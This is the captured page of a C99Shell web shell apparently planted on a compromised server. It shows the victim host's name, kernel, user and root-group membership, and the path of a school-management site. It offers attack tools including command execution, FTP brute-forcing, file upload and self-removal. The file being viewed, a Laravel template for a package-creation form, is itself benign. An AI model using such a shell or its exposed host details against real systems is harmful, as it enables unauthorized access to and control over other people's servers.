!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.32 GB of 117.98 GB (24.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     a72e27f02e80e958c8cfb5b61eaff3540bab5541.php (3.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="eForm-layouts">
    <form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="<?php echo e(route('superadmin.package.create')); ?>">
        <?php echo csrf_field(); ?> 
        <div class="form-row">
            <div class="fpb-7">
                <label for="name" class="eForm-label"><?php echo e(get_phrase('Name')); ?></label>
                <input type="text" class="form-control eForm-control" id="name" name = "name" placeholder="Provide package name" required>
            </div>
            <div class="fpb-7">
                <label for="price" class="eForm-label"><?php echo e(get_phrase('Package price')); ?></label>
                <input type="number" min="0" class="form-control eForm-control" id="price" name = "price" placeholder="Provide package price" required>
            </div>
            <div class="fpb-7">
                <label for="package_type" class="eForm-label"><?php echo e(get_phrase('Package Type')); ?></label>
                <select name="package_type" id="package_type" class="form-select eForm-select eChoice-multiple-with-remove">
                    <option value=""><?php echo e(get_phrase('Select a package type')); ?></option>
                    <option value="paid"><?php echo e(get_phrase('Paid')); ?></option>
                    <option value="trail"><?php echo e(get_phrase('Trail')); ?></option>
                </select>
            </div>
            <div class="fpb-7">
                <label for="interval" class="eForm-label"><?php echo e(get_phrase('Interval')); ?></label>
                <select name="interval" id="interval" class="form-select eForm-select eChoice-multiple-with-remove">
                    <option value=""><?php echo e(get_phrase('Select a interval')); ?></option>
                    <option value="Days"><?php echo e(get_phrase('Days')); ?></option>
                    <option value="Monthly"><?php echo e(get_phrase('Monthly')); ?></option>
                    <option value="Yearly"><?php echo e(get_phrase('Yearly')); ?></option>
                </select>
            </div>
            <div class="fpb-7">
                <label for="days" class="eForm-label"><?php echo e(get_phrase('Interval Preiod')); ?></label>
                <input type="number" min="0" class="form-control eForm-control" id="days" name = "days" placeholder="Provide interval days/month/year" required>
            </div>
            <div class="fpb-7">
                <label for="status" class="eForm-label"><?php echo e(get_phrase('Status')); ?></label>
                <select name="status" id="status" class="form-select eForm-select eChoice-multiple-with-remove">
                    <option value=""><?php echo e(get_phrase('Select a status')); ?></option>
                    <option value="1"><?php echo e(get_phrase('Active')); ?></option>
                    <option value="0"><?php echo e(get_phrase('Archive')); ?></option>
                </select>
            </div>
            <div class="fpb-7">
                <label for="description" class="eForm-label"><?php echo e(get_phrase('Description')); ?></label>
                <textarea class="form-control eForm-control" id="address" name = "description" rows="2" placeholder="Provide a short description" required></textarea>
            </div>
            <div class="fpb-7 pt-2">
                <button class="btn-form" type="submit"><?php echo e(get_phrase('Create package')); ?></button>
            </div>
        </div>
    </form>
</div>

<script type="text/javascript">

    "use strict";
    
    $(document).ready(function () {
      $(".eChoice-multiple-with-remove").select2();
    });
</script><?php /**PATH E:\scl management\school\resources\views/superadmin/package/add_package.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--